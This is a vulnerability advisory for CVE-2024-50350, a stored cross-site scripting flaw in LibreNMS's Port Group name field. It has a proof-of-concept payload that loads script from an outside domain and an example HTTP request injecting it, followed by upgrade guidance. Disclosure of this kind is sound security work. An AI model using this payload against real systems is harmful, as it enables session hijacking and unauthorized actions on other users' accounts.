CVE-2024-50350
LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php
Description
### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the "Port Settings" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions. ### Details When creating a new "Port Group," an attacker can inject the following XSS payload into the "name" parameter: ```<script/src=//15.rs></script>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The payload triggers when the affected Port Group is added to a device and the "Port Settings" page is reloaded. The vulnerability is due to insufficient sanitization of the "name" parameter. The sink responsible for this issue is: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69 ### PoC 1. Create a new Port Group using the following payload in the "name" parameter: ```name<script/src=//15.rs></script>``` 2. Add the Port Group to a device's port settings. 3. Reload the "Port Settings" page. 4. Observe that the injected script executes. Example Request: ```http POST /port-groups HTTP/1.1 Host: <your_host> Content-Type: application/x-www-form-urlencoded Cookie: <your_cookie> _token=<your_token>&name=name<script/src=//15.rs></script>&desc=descr<script/src=//15.rs></script> ``` ### Impact This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Port Settings" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.
How to fix CVE-2024-50350
To remediate CVE-2024-50350, upgrade the affected package to a fixed version below.
- —upgrade to 24.10.0 or later
Is CVE-2024-50350 being exploited?
Low — EPSS is 0.9%, meaning exploitation activity has not been observed at scale.